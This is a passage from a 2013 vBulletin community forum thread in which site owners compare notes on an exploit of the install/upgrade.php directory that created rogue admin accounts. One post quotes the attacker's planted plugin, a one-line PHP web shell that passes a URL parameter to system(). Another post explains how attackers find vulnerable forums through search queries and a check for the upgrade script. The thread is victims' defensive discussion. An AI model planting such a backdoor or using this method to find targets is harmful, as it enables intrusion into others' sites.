Announcement

Collapse
No announcement yet.

A new type hack method?

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    Originally posted by DF031 View Post
    I agree, what about all those admins not visiting the forums ?

    VB should have contacted all forum owners. It is not too late to do that and provide this basic support !
    Agreed!! I "happened" to see this in the CP yesterday, and went ahead and did what they said. BUT, they didnt say "check to see if you had admin accounts to see if you have been compromised. I did what they asked and researched no further. Today I am out like 40,000 posts that were deleted early this morning.

    how about an email to all owners, not only with a fix, but what to check to see if you've been compromised? Handled very badly

    Comment


    • #17
      Originally posted by Hawkmoth View Post
      As above. This problem was found on Tuesday morning about 11 am Japan time. Like reignman, we had 2 people registered as federal. One is now deleted and the other had all permissions removed an PW changed. I have no idea how he got in. All new members receive an email with an activation link in it. They have to click to become active but even then they only go into a admin queue for final approval. Supposedly, no one can do anything until admin approval and only admins can do it, not mods. Maybe Abdou found some way to make himself an admin but I don't know how.

      I have also found a file "federal" in the plugin and that is removed. We only have vb software and vb advanced for the front page (with all our language forums). vba is the only plugin that is set up. All "abdou" did is deface our frontpage. The forum works fine from forum/php page. I have removed the install file as Zachary has indicated. But the problem has not been resolved.

      NB; vis a vis Abdou, we may have identified him and some of his hacker friends. Since our website runs on a US server Abdou has violated federal law (maybe USC Title 18 but I don't have the citation in front of me). Abdou has been reported to law enforcement agencies in the USA and UK among others. If anyone else has been hacked and you have any LE friends, let them know.
      He gets admin priviliges when registering to the forum (using the exploit) So he can do whatever he wants.

      Another warning to forum owners: if your password in config.php is equal to your ftp/server passwords, you have to change these passwords.

      Comment


      • #18
        Originally posted by Jamsoft View Post

        Agreed!! I "happened" to see this in the CP yesterday, and went ahead and did what they said. BUT, they didnt say "check to see if you had admin accounts to see if you have been compromised. I did what they asked and researched no further. Today I am out like 40,000 posts that were deleted early this morning.

        how about an email to all owners, not only with a fix, but what to check to see if you've been compromised? Handled very badly
        Yes, that was a big mistake. I don't know why CP message didn't incluse this "added admins" warning.

        By the way, are you sure that these messages were deleted by this hacker called "abdou" ?

        Comment


        • #19
          I have the same problem. The hacker has registered as an Admin, then created this a plugin with the hook location ajax_start:

          Code:
          if(isset($_GET['lol'])){echo
          "<h1>pwn</h1><pre>"; system($_GET
          ['lol']);exit;}
          Please advise. I don't have the install directory at all prior to this hack.

          Comment


          • #20
            Originally posted by Infection View Post
            I have the same problem. The hacker has registered as an Admin, then created this a plugin with the hook location ajax_start:

            Code:
            if(isset($_GET['lol'])){echo
            "<h1>pwn</h1><pre>"; system($_GET
            ['lol']);exit;}
            Please advise. I don't have the install directory at all prior to this hack.
            Which version do you use? If you use vBulletin 5, install directory is inside core directory. >>> /core/install

            He needs install/upgrade.php in order to complete hijacking, so if you don't have "install" directory and still you have the above problem, that means it's another vulnerability.

            Comment


            • #21
              I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

              I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?

              Comment


              • #22
                Originally posted by Reignman View Post

                Which version do you use? If you use vBulletin 5, install directory is inside core directory. >>> /core/install

                He needs install/upgrade.php in order to complete hijacking, so if you don't have "install" directory and still you have the above problem, that means it's another vulnerability.
                I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

                Does anyone have any ideas as to what this could be?

                Comment


                • #23
                  Originally posted by KryptonSite View Post
                  I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

                  I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?
                  Do you have any "strange" plugin on your vbulletin products? It's one of the smyptoms of this exploit.

                  Originally posted by Infection View Post

                  I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

                  Does anyone have any ideas as to what this could be?
                  Probably it's another one. Better contact to vbulletion support.

                  Bad thing is I see slight changes on codes, hacking messages. So I think it's now spreaded around.

                  Comment


                  • #24
                    my site was hacked with new name
                    www.jntuhub.com | www.jntuhub.in |

                    Comment


                    • #25
                      How does something like this get around so quickly?
                      Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
                      I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?

                      But is the install folder the hole? Has this been clarified?

                      How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.

                      What do they search for in order to complete the job?


                      Comment


                      • #26
                        Originally posted by DemOnstar View Post
                        How does something like this get around so quickly?
                        Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
                        I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?

                        But is the install folder the hole? Has this been clarified?

                        How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.

                        What do they search for in order to complete the job?
                        Yes, hole is in the install folder (at least for this exploit)

                        They search for vbulletin powered websites using phrases like (powered by vbulletin 4.2.0 / 4.2.1 / 5) and then they check manually if install folder exists by typing domain.com/forumpath/install/upgrade.php

                        If it exists they complete the job using exploit they found. (I wonder if vbulletin team has found what is it yet??? ) If it doesn't exist, they turn back to "Google" and search for other potential victims.

                        But what we know is they can use this exploit for only 4.2.0+ and 5 versions of vbulletin.
                        Last edited by Reignman; Mon 2nd Sep '13, 5:01am.

                        Comment


                        • DemOnstar
                          DemOnstar commented
                          Editing a comment
                          Very good Reignman, that is exactly what I wanted to hear...It seems so easy to mess up someones life..and all that is needed is a search on Google.. Extraordinary!

                      • #27
                        What about VB not sending an advice email to licensed members ?? I was here for another problem and now I am reading this thread, really surprised !!

                        Comment


                        • #28
                          Looks like I got hit with a similar exploit - they did not deface my site like the OP's - not yet anyway. They did find a way to add about 10 new users, all with the same username, (Th3H4ck) and all with admin privs.

                          I would not have known about this vulnerability, or the active exploit, if they had not .. maybe I should not post what triggered my knowledge of this.

                          I would of like to have received an email about this exploit. Now going to 302 redirect to my buddypress install. Hope my host has backup database and files from 5 days ago. Fingers crossed.

                          vbulletin 4.2.1 running, and had new member moderation turned on -

                          what I wonder is how they were able to run sql insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.

                          Will we get an email if the exploit fix is found?

                          Comment


                          • #29
                            Originally posted by djsteve007 View Post

                            Will we get an email if the exploit fix is found?
                            I think that is extremely likely now. Although, stranger things can happen..


                            Comment


                            • #30
                              Originally posted by djsteve007 View Post
                              vbulletin 4.2.1 running, and had new member moderation turned on -

                              what I wonder is how they were able to run sql insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.
                              If you use version 4, you don't have /core/install but only /install in your forum root.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X